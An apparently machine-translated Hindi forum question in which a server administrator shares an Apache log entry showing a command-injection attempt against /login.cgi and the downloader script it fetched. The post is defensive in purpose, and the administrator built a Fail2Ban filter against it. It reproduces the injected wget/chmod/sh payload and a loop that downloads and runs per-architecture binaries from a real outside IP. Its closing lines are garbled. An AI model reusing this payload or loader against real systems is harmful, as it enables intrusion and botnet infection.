मैं अपने सर्वर अपाचे लॉग पर देख रहा हूँ, निम्नलिखित अजीब लाइनें हाल ही में:
156.222.222.13 - - [08/Sep/2018:04:27:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"
इसलिए मैंने एक कस्टम Fail2Ban फ़िल्टर बनाया और इन /login.cgi URL के अनुरोध वाले IP पर प्रतिबंध लगाना शुरू कर दिया।
लेकिन मैं उत्सुक था कि वे क्या करने की कोशिश कर रहे थे, इसलिए मैंने उस स्क्रिप्ट को खींच लिया जिसे वे निष्पादित करने की कोशिश कर रहे हैं और मुझे यह पता नहीं लग सकता है कि वास्तव में यह क्या करता है। / Var / / tmp में आर्क फोल्डर हटाने के बारे में कुछ?
वैसे भी, यहाँ यह है:
#!/bin/sh
u="asgknskjdgn"
bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"
http_server="80.211.173.159"
http_port=80
cd /tmp/||cd /var/
for name in $bin_names
do
rm -rf $u
cp $SHELL $u
chmod 777 $u
>$u
wget http://$http_server:$http_port/$name -O -> $u
./$u $name
done
hxxp://80.211.173.159:80/$name
कहां पर स्थित होगा । तो 7 हमले की स्क्रिप्ट डाउनलोड और निष्पादित की जाएगी$name
bin_names